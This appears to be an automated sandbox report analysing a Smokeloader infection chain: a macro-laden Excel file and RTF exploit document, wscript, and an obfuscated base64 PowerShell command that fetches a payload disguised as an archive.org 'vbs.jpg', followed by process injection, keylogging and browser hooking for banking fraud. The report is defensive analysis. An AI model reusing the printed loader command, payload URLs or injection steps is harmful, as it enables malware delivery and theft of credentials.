            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: crash.sh.url.4.drString found in binary or memory: https://crash.sh/
            Source: udMVqm.url.4.drString found in binary or memory: https://crash.sh/udMVqm
            Source: 40830001.xlsString found in binary or memory: https://crash.sh/udMVqm--C
            Source: 96630000.0.dr, ~DF5F0CCF6F4019BF3C.TMP.0.drString found in binary or memory: https://crash.sh/udMVqmyX
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 0000000D.00000002.453954500.000000000231B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
            Source: powershell.exe, 0000000D.00000002.453885422.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
            Source: powershell.exe, 0000000B.00000002.457563315.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
            Source: powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
            Source: 7947.tmp.19.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49163 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match | File source: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3164, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3216, type: MEMORYSTR
            Source: Yara match | File source: 13.2.powershell.exe.2565ab4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_0008162B GetKeyboardState,ToUnicode, 26_2_0008162B

            E-Banking Fraud

            Source: C:\Windows\SysWOW64\explorer.exe | Code function: StrStrIA, chrome.exe|opera.exe|msedge.exe 22_2_00082EA8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe 22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe 22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe 22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe 22_2_00083862

            System Summary

            Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: Process Memory Space: powershell.exe PID: 2984, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 40830001.xls | OLE: Microsoft Excel 2007+
            Source: 96630000.0.dr | OLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\udMVqm.url
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\crash.sh.url
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 9402
            Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? 
?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\dagifhd | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00402F5D RtlCreateUserThread,NtTerminateProcess, 14_2_00402F5D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 14_2_004014BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess, 14_2_00402321
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004025D3 NtClose, 14_2_004025D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 14_2_004014D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess, 14_2_004022D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess, 14_2_004022D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess, 14_2_004022E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 14_2_004014E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 14_2_004014EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess, 14_2_004022F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00402686 NtClose, 14_2_00402686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,wcsstr,tolower,towlower, 14_2_0040328D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,wcsstr,tolower,towlower,14_2_0040328D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004030BF RtlCreateUserThread,NtTerminateProcess,14_2_004030BF
            Source: C:\Windows\explorer.exeCode function: 15_2_02802FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,15_2_02802FAC
            Source: C:\Windows\explorer.exeCode function: 15_2_02804760 NtCreateSection,15_2_02804760
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C4B92 RtlMoveMemory,NtUnmapViewOfSection,19_2_000C4B92
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C33C3 NtQueryInformationFile,19_2_000C33C3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C342B NtQueryObject,NtQueryObject,RtlMoveMemory,19_2_000C342B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,19_2_000C349B
            Source: C:\Windows\explorer.exeCode function: 20_2_000638B0 NtUnmapViewOfSection,20_2_000638B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_00081016 RtlMoveMemory,NtUnmapViewOfSection,21_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,22_2_00083D8D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00082E1B OpenProcess,lstrcmpi,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,22_2_00082E1B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081F4E NtCreateSection,NtMapViewOfSection,22_2_00081F4E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081FE5 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_00081FE5
            Source: C:\Windows\explorer.exeCode function: 23_2_000E5300 RtlAllocateHeap,NtUnmapViewOfSection,23_2_000E5300
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,24_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081A80 NtCreateSection,NtMapViewOfSection,24_2_00081A80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,24_2_00081819
            Source: C:\Windows\explorer.exeCode function: 25_2_000E355C RtlAllocateHeap,NtUnmapViewOfSection,25_2_000E355C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,26_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00081B26 NtCreateSection,NtMapViewOfSection,26_2_00081B26
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_000818BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,26_2_000818BF
            Source: C:\Windows\explorer.exeCode function: 27_2_000E370C RtlAllocateHeap,NtUnmapViewOfSection,27_2_000E370C
            Source: C:\Windows\explorer.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00304D6013_2_00304D60
            Source: C:\Windows\explorer.exeCode function: 15_2_0280284015_2_02802840
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C219819_2_000C2198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000CC2F919_2_000CC2F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000DB35C19_2_000DB35C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0011443819_2_00114438
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000DB97E19_2_000DB97E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C6E6A19_2_000C6E6A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000E5F0819_2_000E5F08
            Source: C:\Windows\explorer.exeCode function: 20_2_00061E2020_2_00061E20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008170B21_2_0008170B
            Source: C:\Windows\explorer.exeCode function: 23_2_000E2C0023_2_000E2C00
            Source: C:\Windows\explorer.exeCode function: 25_2_000E205425_2_000E2054
            Source: C:\Windows\explorer.exeCode function: 25_2_000E286025_2_000E2860
            Source: C:\Windows\explorer.exeCode function: 27_2_000E2A0427_2_000E2A04
            Source: C:\Windows\explorer.exeCode function: 27_2_000E20F427_2_000E20F4
            Source: 40830001.xlsOLE indicator, VBA macros: true
